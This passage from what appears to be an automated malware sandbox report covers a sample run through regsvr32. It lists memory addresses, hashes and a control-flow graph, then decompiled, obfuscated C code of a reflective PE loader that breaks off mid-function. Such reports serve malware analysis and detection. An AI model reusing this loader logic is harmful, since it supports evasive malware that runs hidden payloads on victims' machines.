                                                                                                                0x001c17c4
                                                                                                                0x001c17cc
                                                                                                                0x001c17d0
                                                                                                                0x001c17d8
                                                                                                                0x001c17dd
                                                                                                                0x001c17e2
                                                                                                                0x001c17ea
                                                                                                                0x001c17ea
                                                                                                                0x001c17f8
                                                                                                                0x001c19b1
                                                                                                                0x001c19b8
                                                                                                                0x00000000
                                                                                                                0x001c17fe
                                                                                                                0x001c1804
                                                                                                                0x001c19f6
                                                                                                                0x001c180a
                                                                                                                0x001c1810
                                                                                                                0x001c190f
                                                                                                                0x001c1916
                                                                                                                0x001c191d
                                                                                                                0x001c1924
                                                                                                                0x001c192b
                                                                                                                0x001c1932
                                                                                                                0x001c1941
                                                                                                                0x001c1953
                                                                                                                0x001c196b
                                                                                                                0x001c1972
                                                                                                                0x001c1979
                                                                                                                0x001c1980
                                                                                                                0x001c1987
                                                                                                                0x001c198b
                                                                                                                0x001c198d
                                                                                                                0x001c1990
                                                                                                                0x00000000
                                                                                                                0x001c1816
                                                                                                                0x001c181c
                                                                                                                0x001c18f2
                                                                                                                0x001c18f7
                                                                                                                0x001c18f9
                                                                                                                0x001c18fc
                                                                                                                0x001c18ff
                                                                                                                0x001c1905
                                                                                                                0x00000000
                                                                                                                0x001c1905
                                                                                                                0x001c1822
                                                                                                                0x001c1828
                                                                                                                0x001c183a
                                                                                                                0x001c183e
                                                                                                                0x001c1843
                                                                                                                0x001c1852
                                                                                                                0x001c1879
                                                                                                                0x001c187e
                                                                                                                0x001c1887
                                                                                                                0x001c18a1
                                                                                                                0x001c18a6
                                                                                                                0x001c18a9
                                                                                                                0x00000000
                                                                                                                0x001c182a
                                                                                                                0x001c1830
                                                                                                                0x00000000
                                                                                                                0x001c1836
                                                                                                                0x001c1836
                                                                                                                0x00000000
                                                                                                                0x001c1836
                                                                                                                0x001c1830
                                                                                                                0x001c1828
                                                                                                                0x001c181c
                                                                                                                0x001c1810
                                                                                                                0x001c1804
                                                                                                                0x001c1a00
                                                                                                                0x001c1a09
                                                                                                                0x001c1a09
                                                                                                                0x001c19c7
                                                                                                                0x001c19ce
                                                                                                                0x001c19d3
                                                                                                                0x001c19da
                                                                                                                0x001c19da
                                                                                                                0x001c19da
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 6CR$?Cd$Xh/$XvN$c$k/$vQ$;i
                                                                                                                • API String ID: 2962429428-1642066035
                                                                                                                • Opcode ID: 1d02e4c71be870325b0c836d8bd5e06328124d06610abf586e55ef576630e198
                                                                                                                • Instruction ID: c627c8223f5703691073e378807d8f27de02d46203dcb436a11388359d5d8264
                                                                                                                • Opcode Fuzzy Hash: 1d02e4c71be870325b0c836d8bd5e06328124d06610abf586e55ef576630e198
                                                                                                                • Instruction Fuzzy Hash: EBE110724083809FD3A8CF65C549A9BBBE1FBD5758F108A1DF1DA86260DBB18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10008DE0 Relevance: 9.8, APIs: 4, Strings: 1, Instructions: 1034memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 421 10008de0-10008e78 call 10006690 424 10008e7e-10008ec7 421->424 425 1000956f-10009578 421->425 424->425 426 10008ecd-10008f76 call 10006690 424->426 426->425 429 10008f7c-10008fd1 426->429 429->425 430 10008fd7-1000900a 429->430 430->425 431 10009010-10009036 430->431 431->425 432 1000903c-10009086 431->432 433 1000919b 432->433 434 1000908c-100090c9 432->434 436 1000919f-10009290 GetNativeSystemInfo call 10006650 * 2 433->436 435 100090d0-100090d8 434->435 438 10009126-10009141 435->438 439 100090da-10009124 435->439 436->425 447 10009296-1000938a 436->447 441 10009143-1000914b 438->441 439->441 443 10009189-10009193 441->443 444 1000914d-10009187 441->444 443->435 446 10009199 443->446 444->443 446->436 449 10009390-1000943f 447->449 450 10009445-10009511 GetProcessHeap HeapAlloc 447->450 449->425 449->450 451 10009513-1000956c 450->451 452 10009579-100096a7 call 10006690 450->452 451->425 457 10009b34-10009b46 call 100088f0 452->457 458 100096ad-1000992c memcpy call 100066c0 452->458 458->457 464 10009932-10009978 458->464 465 10009a3b 464->465 466 1000997e-10009a39 call 100076d0 464->466 468 10009a42-10009a89 call 10007ae0 465->468 466->468 468->457 472 10009a8f-10009ad7 call 10007030 468->472 474 10009adc-10009ae1 472->474 474->457 475 10009ae3-10009b32 call 100075d0 474->475 475->457 478 10009b47-10009b4e 475->478 479 10009b50-10009b5a 478->479 480 10009bc9-10009bd9 478->480 481 10009b84-10009bc8 479->481 482 10009b5c-10009b83 479->482
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10008DE0(void* __eflags) {
				signed int _t374;
				void* _t386;
				signed short* _t396;
				signed int _t402;
				void* _t416;
				signed int _t418;
				signed int _t419;
				intOrPtr _t422;
				intOrPtr _t434;
				signed int _t436;
				signed int _t438;
				void* _t446;
				signed int _t448;
				signed int _t449;
				void* _t452;
				signed int _t466;
				signed int _t475;
				signed int _t479;
				void* _t486;
				signed int _t487;
				signed int _t494;
				void* _t507;
				signed int _t512;
				void* _t516;
				signed int _t517;
				signed int _t524;
				intOrPtr _t527;
				signed int _t528;
				void* _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t538;
				signed int _t539;
				void* _t549;
				void* _t558;
				signed int _t561;
				signed int _t573;
				void* _t585;
				signed int _t601;
				intOrPtr _t612;
				signed int _t613;
				void* _t628;
				signed int _t641;
				signed int _t653;
				signed int _t660;
				signed int _t664;
				signed int _t670;
				signed int _t687;
				signed int _t693;
				signed int _t700;
				signed int _t710;
				signed int _t711;
				signed int _t721;
				signed int _t724;
				signed int _t739;
				signed int _t744;
				signed int _t750;
				signed int _t755;
				signed int _t768;
				signed int _t775;
				signed int _t785;
				signed int _t800;
				signed int _t802;
				signed int _t804;
				signed int _t807;
				signed int _t808;
				signed int _t815;
				signed int _t816;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				intOrPtr _t827;
				signed int _t833;
				signed int _t843;
				signed int _t869;
				signed int _t880;
				signed int _t888;
				intOrPtr _t895;
				signed int _t904;
				signed int _t910;
				signed int _t916;
				signed int _t924;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t934;
				signed int _t936;
				signed int _t953;
				signed int _t964;
				signed int _t969;
				signed int _t972;
				signed int _t976;
				signed int _t977;
				signed int _t980;
				signed int _t981;
				signed int _t982;
				signed int _t984;
				signed int _t985;
				signed int _t986;
				signed int _t990;
				signed int _t992;
				signed int _t993;
				signed int _t997;
				signed int _t1019;
				signed int _t1020;
				signed int _t1023;
				intOrPtr* _t1025;
				signed int _t1026;
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				intOrPtr _t1042;
				intOrPtr _t1043;
				signed int _t1044;
				void* _t1054;
				signed int _t1063;
				signed int _t1070;
				signed int _t1078;
				signed int _t1079;
				intOrPtr _t1087;
				signed int _t1088;
				signed int _t1093;
				signed int _t1102;
				signed int _t1113;
				signed int _t1114;
				intOrPtr _t1141;
				signed int _t1142;
				signed int _t1152;
				signed int _t1166;
				signed int _t1175;
				signed int _t1182;
				signed int _t1218;
				void* _t1226;
				void* _t1227;
				void* _t1228;
				void* _t1229;
				void* _t1230;
				void* _t1231;

				_t721 =  *0x1006c2cc; // 0x0
				_t1034 =  *0x1006c2d0; // 0x0
				_t1114 =  *0x1006c2bc; // 0x0
				_t1019 =  *0x1006c2c0; // 0x0
				 *(_t1226 + 0x1c) = _t1034 * _t1019;
				_t374 =  *0x1006c2c4; // 0x0
				_t641 =  *0x1006c2c8; // 0x0
				_t9 = ((_t374 * _t721 + _t1034 + _t1114 + 1) * _t374 + _t1019 * _t721 + _t1114 + _t1114 * 2) * 4; // 0x40
				 *((intOrPtr*)(_t1226 + 0x24)) = 0;
				_t386 = E10006690((_t641 * 4 - 4) * _t1034 + _t9 + 0x40,  *((intOrPtr*)(_t1226 + 0x5c)) + 2 + (1 -  *(_t1226 + 0x1c) -  *0x1006c2c4) *  *0x1006c2cc - _t1034 - _t1019 +  *0x1006c2c4);
				_t1227 = _t1226 + 4;
				if(_t386 == 0) {
					L21:
					return 0;
				} else {
					_t724 =  *0x1006c2c4; // 0x0
					_t17 = _t1114 + 2; // 0x2
					_t19 = (_t641 * _t1034 * _t1019 - 4) * _t1034 - (_t724 * _t1019 + _t17) *  *0x1006c2cc - _t641 * _t641 * _t1019 +  *0x1006c2c4 + 0x5a4d; // 0x5a4d
					_t396 =  *(_t1227 + 0x58);
					if(( *_t396 & 0x0000ffff) != _t1114 * _t1019 + _t19) {
						goto L21;
					} else {
						 *(_t1227 + 0x20) = _t396[0x1e];
						 *(_t1227 + 0x18) = _t1034 * _t1114;
						_t25 = _t1114 + 1; // 0x1
						_t402 =  *0x1006c2cc; // 0x0
						_t869 =  *0x1006c2cc; // 0x0
						_t1115 = _t1114 *  *0x1006c2c4;
						 *(_t1227 + 0x20) = ( *(_t1227 + 0x18) * _t1114 - _t641 - _t869 + 2) * _t869 - _t1034 * _t1034 + _t1019;
						_t36 = _t1115 * 4; // -5
						_t416 = E10006690(((_t641 * _t1019 * 4 - 4) *  *0x1006c2c4 + _t402 + _t402 + _t402 + _t402) *  *0x1006c2c4 + (0x1f - _t1019 -  *0x1006c2cc + 0x1f - _t1019 -  *0x1006c2cc - (_t1019 + _t25) * _t1034) * 4 - _t641 * 4 +  *(_t1227 + 0x20), (_t1114 *  *0x1006c2c4 + _t36 - 5) * _t641 + ( *(_t1227 + 0x18) * _t1114 - _t641 - _t869 + 2) * _t869 - _t1034 * _t1034 + _t1019 +  *((intOrPtr*)(_t1227 + 0x5c)) +  *(_t1227 + 0x20) * 4);
						_t1228 = _t1227 + 4;
						if(_t416 == 0) {
							goto L21;
						} else {
							_t739 =  *0x1006c2c4; // 0x0
							_t418 = _t739 * _t739;
							 *(_t1228 + 0x14) = _t418;
							_t419 =  *0x1006c2cc; // 0x0
							 *((intOrPtr*)(_t1228 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x58)) + 0x3c)) + (_t418 - _t1019 + _t419) * 4 +  *((intOrPtr*)(_t1228 + 0x58));
							_t880 =  *0x1006c2bc; // 0x0
							if( *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x10)))) != 0x4550 + ((_t1034 + _t880) * _t1034 + (_t880 + 1) * _t419 - _t641 + _t739 + _t1019) * 4) {
								goto L21;
							} else {
								_t53 = _t1034 - 2; // -2
								_t422 =  *((intOrPtr*)(_t1228 + 0x10));
								if(( *(_t422 + 4) & 0x0000ffff) != (4 + _t739 * 4) *  *0x1006c2bc + 0x14c + (_t53 * _t419 - (_t419 + 3) * _t1019 + _t641 + _t1034 + _t739) * 4) {
									goto L21;
								} else {
									_t888 =  *0x1006c2cc; // 0x0
									 *(_t1228 + 0x20) =  *(_t422 + 0x38);
									_t67 = (_t641 + _t739 + _t888) * 4; // 0x1
									if(( *(_t1228 + 0x20) & (_t888 * 0x00000004 - 0x00000004) * _t1034 + _t67 + 0x00000001) != 0) {
										goto L21;
									} else {
										_t73 = _t1034 - 1; // -1
										_t74 = _t1019 - 4; // -4
										_t434 =  *((intOrPtr*)(_t1228 + 0x10));
										 *((intOrPtr*)(_t1228 + 0x28)) = (((_t739 + _t1019) *  *0x1006c2bc - 2) * _t641 + _t73 * _t1034 + _t74 * _t888 - _t739 + (((_t739 + _t1019) *  *0x1006c2bc - 2) * _t641 + _t73 * _t1034 + _t74 * _t888 - _t739) * 4 << 4) + _t434 + ( *(_t434 + 0x14) & 0x0000ffff) + 0x18;
										_t895 = ( *(_t434 + 6) & 0x0000ffff) + ( *(_t1228 + 0x14) + _t1034 * 2) * 2;
										if(_t895 <= 0) {
											_t1141 =  *((intOrPtr*)(_t1228 + 0x24));
										} else {
											_t613 =  *0x1006c2bc; // 0x0
											_t90 = _t1034 + 8; // 0x8
											 *((intOrPtr*)(_t1228 + 0x1c)) = _t895;
											_t1141 =  *((intOrPtr*)(_t1228 + 0x24));
											 *((intOrPtr*)(_t1228 + 0x2c)) = (_t613 -  *((intOrPtr*)(_t1228 + 0x1c)) + 2) * _t739 -  *(_t1228 + 0x18) - _t1019 -  *0x1006c2cc + (_t613 -  *((intOrPtr*)(_t1228 + 0x1c)) + 2) * _t739 -  *(_t1228 + 0x18) - _t1019 -  *0x1006c2cc - (_t1034 + _t90) * _t641;
											 *(_t1228 + 0x14) =  *((intOrPtr*)(_t1228 + 0x28)) + 0xc;
											do {
												if( *((intOrPtr*)( *(_t1228 + 0x14) + 4)) != 0) {
													_t628 =  *((intOrPtr*)( *(_t1228 + 0x14) + 4)) + (_t1019 * _t1019 * _t1019 - _t1034 + _t1034) * 4 +  *( *(_t1228 + 0x14));
												} else {
													_t628 = ( ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) - (4 + _t739 * 4) * _t1019 + 8) *  *0x1006c2cc + (4 + _t739 * 4) * _t1034 - _t1019 * 8 - _t641 * 4 +  *( *(_t1228 + 0x14)) +  *(_t1228 + 0x20);
												}
												if(_t628 >  *((intOrPtr*)(_t1228 + 0x2c)) + _t1141) {
													_t1218 =  *0x1006c2cc; // 0x0
													_t739 =  *0x1006c2c4; // 0x0
													_t1141 = (_t1218 - (_t1034 * _t739 + 1) * _t739 - _t641 - 1) * _t739 + (2 -  *(_t1228 + 0x18)) *  *0x1006c2bc - _t641 + _t641 - _t1019 + _t628;
												}
												 *(_t1228 + 0x14) =  *(_t1228 + 0x14) + 0x28;
												_t119 = _t1228 + 0x1c;
												 *_t119 =  *((intOrPtr*)(_t1228 + 0x1c)) - 1;
											} while ( *_t119 != 0);
										}
										_t436 =  *0x1006c2cc; // 0x0
										_t122 = _t436 + 1; // 0x1
										 *0x1006f020(_t1228 + 0x30 + (_t122 * _t1019 + (_t641 *  *0x1006c2bc - _t1034 * _t739 * _t1019 - 1) * _t739 + _t436) * 0xb4);
										_t438 =  *0x1006c2cc; // 0x0
										_t1037 =  *0x1006c2c8; // 0x0
										_t744 =  *0x1006c2c4; // 0x0
										 *(_t1228 + 0x18) = _t438 + _t438 * 4;
										_t1020 =  *0x1006c2c0; // 0x0
										_t130 = _t438 + 2; // 0x2
										_t904 =  *0x1006c2d0; // 0x0
										_t653 =  *0x1006c2bc; // 0x0
										_t446 = E10006650((_t438 + _t130) *  *0x1006c2bc +  *((intOrPtr*)(_t1228 + 0x34)) + (_t744 + _t744 - _t1037 * _t438 -  *0x1006c2d0 + _t1020) * 2, (( *(_t1228 + 0x18) - _t1020 + _t1020 * 4) *  *0x1006c2bc -  *(_t1228 + 0x18) - 5) * _t438 + _t1020 * _t1020 - _t904 + _t904 + _t1037 + _t653 + (_t1020 * _t1020 - _t904 + _t904 + _t1037 + _t653) * 4 +  *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x10)) + 0x50)));
										_t750 =  *0x1006c2d0; // 0x0
										 *(_t1228 + 0x20) = _t446 - _t750 + _t1020 + _t750 + _t1020 + _t750 + _t1020 + _t750 + _t1020;
										_t448 =  *0x1006c2cc; // 0x0
										_t449 =  *0x1006c2c4; // 0x0
										_t452 = E10006650( *((intOrPtr*)(_t1228 + 0x38)) + _t448 * 2, _t449 + _t449 + _t1141);
										_t1229 = _t1228 + 8;
										if( *((intOrPtr*)(_t1229 + 0x1c)) != _t452) {
											goto L21;
										} else {
											_t910 =  *0x1006c2c4; // 0x0
											_t1142 =  *0x1006c2d0; // 0x0
											_t755 = _t653 + _t910;
											_t916 =  *0x1006c2cc; // 0x0
											_t155 = (_t755 - _t916) * 4; // 0x8
											_t466 =  *0x1006c2c4; // 0x0
											_t163 = _t1037 * 4; // 0x5
											_t475 =  *0x1006c2d0; // 0x0
											_t169 = _t653 + 1; // 0x1
											_t170 = _t475 - 2; // -2
											_t1042 =  *((intOrPtr*)(_t1229 + 0x74))(((4 - _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4) * _t653 + 4) * _t475 + (_t169 * _t1020 + _t170 * _t916 - _t1037) * 4 +  *((intOrPtr*)( *((intOrPtr*)(_t1229 + 0x20)) + 0x34)),  *((intOrPtr*)(_t1229 + 0x28)), ((0x00000004 - _t1020 * 0x00000008) * _t1037 + _t155 + 0x00000004) * _t916 + 0x00001000 + (_t653 * _t1020 - _t1142 + _t466) * 0x00000004 + (_t653 * _t466 * 0x00000004 - 0x00000004) * _t1037 | (_t1037 + _t163 + 0x00000005 -  *((intOrPtr*)(_t1229 + 0x20))) *  *0x1006c2d0 - _t653 * _t916 + _t1037 + _t1020 + (_t653 * _t916 + _t1037 + _t1020) * 0x00000004 + 0x00002000, (1 - _t910) * _t1037 + _t755 * _t1020 - _t1142 + _t1142 * 2 + _t1142 + _t1142 * 2 + 6,  *((intOrPtr*)(_t1229 + 0x74)));
											_t1230 = _t1229 + 0x14;
											 *((intOrPtr*)(_t1230 + 0x14)) = _t1042;
											if(_t1042 != 0) {
												L19:
												_t1023 =  *0x1006c2c8; // 0x0
												_t479 =  *0x1006c2c4; // 0x0
												_t768 =  *0x1006c2c0; // 0x0
												_t1152 =  *0x1006c2bc; // 0x0
												_t924 =  *0x1006c2cc; // 0x0
												_t198 = _t1152 + 1; // 0x1
												_t199 = _t1023 - 1; // -1
												_t660 =  *0x1006c2d0; // 0x0
												_t771 = (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023;
												_t203 = (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023 + _t771 * 2 + 8; // 0x8
												_t486 = HeapAlloc(GetProcessHeap(), (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023 + _t771 * 2 + _t203, ((_t768 - _t1023 * _t479) * _t768 - _t924 + _t198) * _t924 + _t199 * _t479 - _t660 + 0x40);
												_t927 =  *0x1006c2c0; // 0x0
												_t487 =  *0x1006c2c8; // 0x0
												_t204 = _t487 + 1; // 0x1
												_t775 =  *0x1006c2c4; // 0x0
												_t928 =  *0x1006c2d0; // 0x0
												_t1025 = _t486 + (((_t775 + _t927) *  *0x1006c2bc + 3) * _t928 + _t487 + (2 - _t204 * _t927) *  *0x1006c2cc + (_t775 * _t775 -  *0x1006c2c8) * 2 << 7);
												if(_t1025 != 0) {
													 *((intOrPtr*)(_t1025 + 4)) = _t1042;
													_t929 =  *0x1006c2c4; // 0x0
													_t1043 =  *((intOrPtr*)(_t1230 + 0x10));
													_t930 =  *0x1006c2cc; // 0x0
													_t494 =  *0x1006c2c8; // 0x0
													asm("sbb ecx, ecx");
													 *((intOrPtr*)(_t1025 + 0x1c)) =  *((intOrPtr*)(_t1230 + 0x60));
													 *((intOrPtr*)(_t1025 + 0x24)) =  *((intOrPtr*)(_t1230 + 0x68));
													 *(_t1025 + 0x14) =  ~( ~((0x00000002 - _t929 + _t929) *  *0x1006c2d0 + 0x00002000 + (_t494 + _t930) * 0x00000002 &  *(_t1043 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1025 + 0x20)) =  *((intOrPtr*)(_t1230 + 0x64));
													 *((intOrPtr*)(_t1025 + 0x2c)) =  *((intOrPtr*)(_t1230 + 0x70));
													 *((intOrPtr*)(_t1025 + 0x28)) =  *((intOrPtr*)(_t1230 + 0x6c));
													 *((intOrPtr*)(_t1025 + 0x34)) =  *((intOrPtr*)(_t1230 + 0x74));
													_t934 =  *0x1006c2c0; // 0x0
													_t664 =  *0x1006c2c8; // 0x0
													_t785 =  *0x1006c2bc; // 0x0
													 *((intOrPtr*)(_t1025 + 0x3c)) = (_t785 *  *0x1006c2c4 + _t934 + (_t785 *  *0x1006c2c4 + _t934) * 2 - 3) *  *0x1006c2cc +  *((intOrPtr*)(_t1230 + 0x34)) + _t934 - (_t664 * _t934 + 2) *  *0x1006c2d0 - _t785 *  *0x1006c2c4 + (_t934 - (_t664 * _t934 + 2) *  *0x1006c2d0 - _t785 *  *0x1006c2c4) * 2;
													_t1044 =  *0x1006c2bc; // 0x0
													_t936 =  *0x1006c2c0; // 0x0
													_t670 =  *0x1006c2cc; // 0x0
													_t247 = _t670 + 1; // 0x1
													_t1166 =  *0x1006c2c4; // 0x0
													 *((intOrPtr*)(_t1230 + 0x28)) =  *((intOrPtr*)(_t1043 + 0x54));
													_t251 = _t1044 + 2; // 0x2
													 *(_t1230 + 0x2c) = _t251 *  *0x1006c2d0 - (_t936 + 1) * _t670;
													_t507 = E10006690( *((intOrPtr*)(_t1043 + 0x54)) + ((_t1044 * _t1044 + _t936 - 1) *  *0x1006c2d0 + _t247 * _t936 - _t1166 + _t1166 - _t670) * 4, (_t1044 + _t1044 * 2 + _t1044 + _t1044 * 2 + 3) *  *0x1006c2c4 + _t251 *  *0x1006c2d0 - (_t936 + 1) * _t670 +  *((intOrPtr*)(_t1230 + 0x5c)) + (_t251 *  *0x1006c2d0 - (_t936 + 1) * _t670) * 2);
													_t1231 = _t1230 + 4;
													if(_t507 == 0) {
														L30:
														E100088F0(_t1025);
														return 0;
													} else {
														_t261 = _t670 - 3; // -3
														_t512 =  *0x1006c2d0; // 0x0
														_t800 =  *0x1006c2c8; // 0x0
														_t953 =  *0x1006c2c0; // 0x0
														_t1175 =  *0x1006c2c4; // 0x0
														_t268 = _t512 + 1; // 0x1
														_t516 =  *((intOrPtr*)(_t1231 + 0x74))( *((intOrPtr*)(_t1231 + 0x20)),  *((intOrPtr*)(_t1231 + 0x34)) + ((_t1175 * _t670 - _t800 - _t953 + _t268) * _t670 - _t512 * _t1175 - _t800 + _t800 * 2) * 4, _t1044 * _t953 + (_t1044 - _t800 * _t512 - _t953 - 1) * _t670 + _t512 + _t1175 + _t1175 + _t953 + 0x1000, (2 - _t670) *  *0x1006c2c4 + _t261 *  *0x1006c2c0 + 4 + _t800 * 2 - _t670 + _t1044,  *((intOrPtr*)(_t1231 + 0x74)));
														_t802 =  *0x1006c2c0; // 0x0
														_t1054 = _t516;
														_t517 =  *0x1006c2bc; // 0x0
														_t276 = _t517 + 3; // 0x3
														_t964 =  *0x1006c2c4; // 0x0
														_t282 = _t802 - 2; // -2
														 *(_t1231 + 0x40) = _t1054;
														memcpy(_t1054,  *(_t1231 + 0x70), (_t517 * _t964 + _t517 * _t964 - 2) * _t964 + (_t276 *  *0x1006c2d0 + (_t802 - _t517 + 3) *  *0x1006c2cc + _t802) * 2 + (_t802 + _t282) *  *0x1006c2c8 +  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x24)) + 0x54)));
														_t524 =  *0x1006c2bc; // 0x0
														_t969 =  *0x1006c2c0; // 0x0
														_t804 =  *0x1006c2cc; // 0x0
														_t288 = _t804 * 4; // 0x5cb
														_t1063 =  *0x1006c2d0; // 0x0
														_t527 = (_t969 * _t969 + (_t524 - _t969 + _t804) * _t524 +  *0x1006c2c8 +  *0x1006c2d0) * 0x2e8 - (_t804 + _t288 + 0x5cb) *  *0x1006c2c4 + (0xb9b - _t524 + _t524 * 4) * _t1063 + (0x2e8 - _t1063 + _t1063 * 4) * _t969 - _t804 * 0x5cb + _t524 * 0x2ed +  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x78)) + 0x3c)) +  *((intOrPtr*)(_t1231 + 0x4c));
														 *_t1025 = _t527;
														_t807 =  *0x1006c2cc; // 0x0
														_t808 =  *0x1006c2c0; // 0x0
														_t972 =  *0x1006c2bc; // 0x0
														 *((intOrPtr*)(_t527 + 0x34)) =  *((intOrPtr*)(_t1231 + 0x34)) + ((1 - _t807 * _t807 - _t808) *  *0x1006c2c4 - (_t972 + 1) *  *0x1006c2c8 + _t808 * 2) * 2;
														_t976 =  *0x1006c2d0; // 0x0
														_t1182 =  *0x1006c2cc; // 0x0
														_t687 =  *0x1006c2bc; // 0x0
														_t977 =  *0x1006c2c0; // 0x0
														_t1070 =  *0x1006c2c8; // 0x0
														_t528 =  *0x1006c2c4; // 0x0
														_t693 =  *0x1006c2cc; // 0x0
														_push((_t977 + _t528 * 2 + _t528 + (_t1182 - _t976 *  *0x1006c2bc) * _t976 - ((_t687 *  *0x1006c2cc + 1) * _t977 + 1) * _t1070 + _t693 * 2 << 8) + _t1025);
														_push( *((intOrPtr*)(_t1231 + 0x34)));
														_t1078 =  *0x1006c2bc; // 0x0
														_t1079 =  *0x1006c2d0; // 0x0
														_push( *((intOrPtr*)(_t1231 + 0x84)) + 4 + (2 - (_t1079 * _t528 * _t977 + 1) *  *0x1006c2c8) * _t1079 + (_t1070 * _t528 * _t977 - _t1078 * _t1078 + 1) *  *0x1006c2cc + _t1070 * _t528 + _t977);
														_push( *((intOrPtr*)(_t1231 + 0x80)));
														_t534 = E100066C0();
														_t1231 = _t1231 + 0x30;
														if(_t534 == 0) {
															goto L30;
														} else {
															_t700 =  *0x1006c2cc; // 0x0
															_t535 =  *0x1006c2c0; // 0x0
															_t815 =  *0x1006c2c4; // 0x0
															_t980 =  *0x1006c2d0; // 0x0
															_t314 = _t535 * 2; // 0x1
															_t536 =  *0x1006c2bc; // 0x0
															_t316 = _t536 + 2; // 0x2
															_t1087 = (_t700 + _t314 + 1) * _t815 + _t316 * _t980 - _t700 +  *0x1006c2c0 + ((_t700 + _t314 + 1) * _t815 + _t316 * _t980 - _t700 +  *0x1006c2c0) * 4 +  *((intOrPtr*)( *_t1025 + 0x34)) -  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x10)) + 0x34));
															 *((intOrPtr*)(_t1231 + 0x2c)) = _t1087;
															if(_t1087 == 0) {
																 *((intOrPtr*)(_t1025 + 0x18)) = 1;
															} else {
																_t323 = _t980 + 2; // 0x2
																 *((intOrPtr*)(_t1231 + 0x5c)) = _t323;
																_t1102 =  *0x1006c2c0; // 0x0
																_push( *((intOrPtr*)(_t1231 + 0x2c)) + ((_t536 + _t536 - _t980 * _t815 +  *0x1006c2c8 + _t700) * _t815 - (_t700 +  *((intOrPtr*)(_t1231 + 0x5c))) * _t1102 - _t980 -  *0x1006c2cc + _t536) * 4);
																_t710 =  *0x1006c2c8; // 0x0
																_push((((_t536 * _t815 - 1) * _t710 + _t980 * _t1102 - _t815) * _t1102 + (_t815 - _t980 + 1) *  *0x1006c2cc -  *(_t1231 + 0x60) * _t710 + _t980 + _t815 * 2 << 7) + _t1025);
																_t585 = E100076D0();
																_t833 =  *0x1006c2d0; // 0x0
																_t992 =  *0x1006c2c4; // 0x0
																_t993 =  *0x1006c2c0; // 0x0
																_t1231 = _t1231 + 8;
																 *((intOrPtr*)(_t1025 + 0x18)) = _t585 + (_t833 * _t992 - (_t833 *  *0x1006c2cc + _t992 + 1) *  *0x1006c2c8 - _t993 + _t993) * 4;
															}
															_t816 =  *0x1006c2cc; // 0x0
															_t981 =  *0x1006c2d0; // 0x0
															_t1088 =  *0x1006c2c8; // 0x0
															_t537 =  *0x1006c2c0; // 0x0
															_push((((_t816 - _t981) * _t1088 + _t537 + 1) *  *0x1006c2c4 + (_t537 * _t816 + _t1088) * 2 - _t537 + _t981 << 8) + _t1025);
															_t538 = E10007AE0();
															_t1231 = _t1231 + 4;
															if(_t538 == 0) {
																goto L30;
															} else {
																_t822 =  *0x1006c2c8; // 0x0
																_t982 =  *0x1006c2bc; // 0x0
																_t539 =  *0x1006c2c0; // 0x0
																_t344 = _t539 + 2; // 0x2
																_t984 =  *0x1006c2c4; // 0x0
																_t985 =  *0x1006c2cc; // 0x0
																_t345 = _t985 + 3; // 0x3
																_push(((_t539 - _t984 - 1) * _t984 - (_t982 + _t822 + _t344) *  *0x1006c2d0 - _t345 * _t985 + _t822 * 2 + ((_t539 - _t984 - 1) * _t984 - (_t982 + _t822 + _t344) *  *0x1006c2d0 - _t345 * _t985 + _t822 * 2) * 2 << 6) + _t1025);
																_t549 = E10007030();
																_t1231 = _t1231 + 4;
																if(_t549 == 0) {
																	goto L30;
																} else {
																	_t823 =  *0x1006c2cc; // 0x0
																	_t986 =  *0x1006c2c4; // 0x0
																	_t1093 =  *0x1006c2c0; // 0x0
																	_t352 = _t986 + 2; // 0x2
																	_t824 =  *0x1006c2c8; // 0x0
																	_t558 = E100075D0(((_t823 * _t823 + _t986 + _t1093 + 1) * _t1093 - _t352 * _t823 + (_t824 + 1) *  *0x1006c2bc - _t986 + ((_t823 * _t823 + _t986 + _t1093 + 1) * _t1093 - _t352 * _t823 + (_t824 + 1) *  *0x1006c2bc - _t986) * 2 << 6) + _t1025);
																	_t1231 = _t1231 + 4;
																	if(_t558 != 0) {
																		_t827 =  *((intOrPtr*)( *_t1025 + 0x28));
																		if(_t827 == 0) {
																			 *((intOrPtr*)(_t1025 + 0x38)) = 0;
																			return _t1025;
																		} else {
																			_t990 =  *0x1006c2c0; // 0x0
																			if( *(_t1025 + 0x14) == 0) {
																				_t561 =  *0x1006c2bc; // 0x0
